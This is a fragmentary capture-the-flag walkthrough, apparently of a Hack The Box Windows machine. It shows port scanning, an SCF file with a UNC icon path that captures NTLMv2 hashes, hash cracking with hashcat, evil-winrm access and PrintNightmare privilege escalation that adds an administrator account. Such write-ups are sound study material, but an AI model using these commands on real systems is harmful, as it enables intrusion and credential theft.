nmap. We can quickly scan for open ports and store them in a variable:
ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.106 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running
nmap's built-in scripts:
nmap -p$ports -sC -sV 10.10.11.106.
admin:adminto sign in works. There is a
fw_up.phppage where we can upload firmware, but there doesn't seem to be an accessible location where those files get uploaded to.
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.106/FUZZ.
135, which is for samba. According to Wikipedia, "Server Message Block (SMB) is a communication protocol that Microsoft created for providing shared access to files and printers across nodes on a network." Since the other two ports look like dead ends for now, we must be able to find something here. Maybe the files are being uploaded to the samba share, which would mean we have write access to that share without authentication details.
X.X.X.Xto our attacker's ip address. Since the
IconFilefield is set to a UNC path, Windows will request the icon from the attacker and try authenticating with the user's credentials, then the attack will issue a challenge request, finally Windows will return a challenge response with the NTLM hash.
fw_up.php) on port 80.
hashcat. We first find the
hashcatmode needed for NTLMv2 hashes with
hashcat --help | grep NTLMv2, which shows us the correct mode is
hashand then run
hashcat -a 0 -m 5600 hash rockyou.txt:
evil-winrmwe can simply run the
upload /home/kali/Downloads/winPEASx64.exe. We can run it with
.\winPEASx64.exe. This doesn't give any easy wins.
evil-winrmon the target run:
upload e.exeand then
backgroundto get mack the the
msfconsole. Then run
use post/multi/recon/local_exploit_suggesterand set the session with
set session 1then
runto get a list of possible exploits. This reveals nothing.
CVE-2021-34527, or PrintNightmare. After enough searching one may find this exploit because the
spoolsvservice is running as shown in WinPEAS's "Current TCP Listening Ports" output (and when simply running
wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1and then upload it to the target with our
evil-winrmconnection by running
upload CVE-2021-1675.ps1. Then, run
set-ExecutionPolicy RemoteSigned -Scope CurrentUserso you don't get the "execution of scripts is disabled on this system" error message (StackOverflow answer where command was found). Now, we can launch the exploit:
[!] failed to get current driver listerror message, but after resetting the box it worked:
evil-winrmas our newly created administrator
evil-winrm -u john -p SuperSecure -i 10.10.11.106. We can get the